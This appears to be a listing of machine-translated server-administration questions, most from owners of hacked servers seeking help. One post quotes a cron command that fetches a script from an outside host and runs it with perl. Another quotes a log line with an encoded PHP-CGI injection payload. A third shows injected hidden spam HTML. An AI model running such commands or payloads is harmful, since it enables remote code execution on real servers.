可能重复: 我的服务器被黑了应急 托pipe公司提供了一封电子邮件给客户,客户希望得到我的一些帮助。 该消息指出: Any items listed here which are folders named with 5 to 7 random letters are are likely FTP account hacks Checking for known bad files /home2/1/public_html/images/sm6ay7.php /home2/1/public_html/images/sm5ak0.php Checking for known spam scripts /home2/1/public_html/images/sm6ay7.php /home2/1/public_html/images/sm5ak0.php /home2/1/public_html/images/rssok4.php These files are suspicious and should be looked at before deleting The redirects in these files […]
我正在研究将Oracle从11.2.0.1升级到11.2.0.3的过程。 我正在计划使用DBUA实用程序。 我的问题是,DBUA会进行必要的更改以保留我的SID并更新TNS,以便不需要进行任何应用程序更改?
68.96.87.214 – – [07/Aug/2013:21:29:25 +0000] "GET /HNAP1/ HTTP/1.1" 403 501 "*************" "Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]" 177.47.105.41 – – [07/Aug/2013:21:57:26 +0000] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 403 476 "-" "-" 193.111.139.189 – – [08/Aug/2013:00:33:26 +0000] "GET /oly/hello.php?i=list&b=oly_living HTTP/1.1" 403 497 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-3360;l:09)" 176.61.139.107 – – [08/Aug/2013:03:57:55 +0000] "GET […]
我有两台专用服务器,几天前开始向我发送有关运行未知cron作业的通知。 在这两台服务器上,我都有我的网站的二级帐户,黑客修改了这些帐户的cron作业,而不是root。 所以我想“也许”他们只有有限的访问。 两者都试图运行以下内容:cd / tmp; wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt; rm -f abc * 第一台服务器的Cronjob输出: http://pastebin.com/m56ga6pp 第二台服务器的Cronjob输出: http://pastebin.com/4utZ8agC 奇怪的是,这两个服务器似乎同时被黑客攻击,并使用相同的方法。 有没有人有这种黑客,可以给我的想法,他是怎么进来的,如果我可以删除它不重新安装..? 在服务器上有很多网站,第一个使用大约500GB,需要很多移动别的地方,重新安装。 提前致谢!
我有一个我认为是一个干净的CentOS 7系统build立,并希望看到networkingstream量,所以我安装了NetHogs。 我很惊讶地发现随机连接,主要是亚太地区的RIPEnetworking。 不过,我也看到了在这个州与中美洲的连接。 NetHogs version 0.8.2-SNAPSHOT PID USER PROGRAM DEV SENT RECEIVED 1421 tnsun sshd: tnsun@pts/0 enp0s3 0.568 0.064 KB/sec ? root xxx.xxx.xxx.xxx:1433-156.3.174.102:56800 0.000 0.000 KB/sec ? root xxx.xxx.xxx.xxx:3306-123.249.45.210:46686 0.000 0.000 KB/sec ? root xxx.xxx.xxx.xxx:111-66.240.236.119:11748 0.000 0.000 KB/sec ? root xxx.xxx.xxx.xxx:23-191.109.233.156:56641 0.000 0.000 KB/sec ? root unknown TCP 0.000 0.000 KB/sec TOTAL 0.568 0.064 […]
我想使用数据守卫在oracle 11g中进行灾难恢复。 但是我不知道该怎么做。 我希望所有给我看文件的人或者做这件事的方法。 任何人都可以帮助我做到这一点? 谢谢你,Ung Sopolin
我在我们自己的服务器上的某个Web站点的根目录(Windows 2003上的IIS6)上收到有关匹配到/EWS/Exchange.asmx(不存在)的日志logging错误消息, 服务器根本不运行交换。 这与任何人知道的攻击有关吗? 从下面的问题来看,这个域名根本没有任何交换电子邮件,所以它看起来像一个脚本的探测。 我会过滤掉,所以我们的错误报告logging器忽略它。
我昨天注意到我的网站已被黑客入侵,而且我现在对某些事情感到非常困惑。 所有的文件 – 据我所知 – 编辑或添加都是用特定的用户帐户完成的; 一个与一些不再使用的软件有关的应该被删除,但是不是。 我删除了所有这些文件(除了一个*),并删除了用户帐户,修复了编辑过的文件等。几乎所有的编辑都在网站的wordpress一侧。 大多数网站不是wordpress,但他们在同一台物理服务器上。 所有的编辑和添加都在被删除用户拥有的目录中,或者由www-data拥有。 *我没有删除的文件 – 但是我重命名并移动了它 – 是黑客使用的工具之一…它的顶部有“Web Shell by oRb”,但是我可以告诉你的。 这使我首先担心(我知道我太冗长了,对不起) – 使用这个工具,我可以在www-data所拥有的任何目录中编辑或创build文件,而且我几乎可以读取每个文件在机器上的目录。 所以我的问题是,这个工具只能做到这一点,因为它已经在服务器上了? 还是我只是开放? 我的第二个问题是,什么是最好的Web服务器的权限? 我知道这已经被问了一百万次。 服务器的所有者都有我的账户作为所有者和我的团队 – 只有我 – 作为团队。 wordpress(我变得非常警惕)的一面都是www-data。 这是否合适? rwx权限应该是什么? 我并不是真的期待任何人来诊断这个大问题 – 他们是如何进入的 – 但第二个问题,主要是第一个问题的任何澄清将非常感激! 谢谢!
服务器信息: Windows XP Service Pack 2 微软IIS / 6.0 一般来说,服务器不在我的监督之下(暂时)。我可以请求补丁丢失,但不能更改Windows版本或IIS版本。 黑客信息: 下面的但是HTML被添加到我们的aspx文件,就在标签下面。 这意味着他们至less可以读/写我们的文件。 这也意味着该页面不是空白的,因为他们有一个额外的<div>标签没有被closures。 我应该注意到,在一些页面上,额外的,未closures的<div>不存在,所以页面继续加载得很好。 <script language="javascript" type="text/javascript"> document.write("<div style='display:none;'>"); </script><div> <a href="http://www.wowgoldlife.com/">wow gold</a> <a href="http://www.guidespower.com/">runescape gold</a> <a href="http://www.riftstore.com/">rift gold</a> <a href="http://www.riftgoldsale.com/">rift platinum</a> <a href="http://www.mywowgoldsite.com/">buy wow gold</a> <a href="http://www.wowgoldsonline.com/">cheap wow gold</a> <a href="http://www.mmogoldsonsale.com/">world of warcraft gold</a> <a href="http://www.rsgpstore.com/">rs gold</a> <a href="http://www.rsgoldlife.com/">buy runescape gold</a> <script language="javascript" […]
我想允许普通用户运行NMAP的高级扫描,如XMAS,TCP FIN,TCP NULL扫描。 有人可以告诉我怎么做? 由于它使用原始数据包,所以设置setuid位是否工作?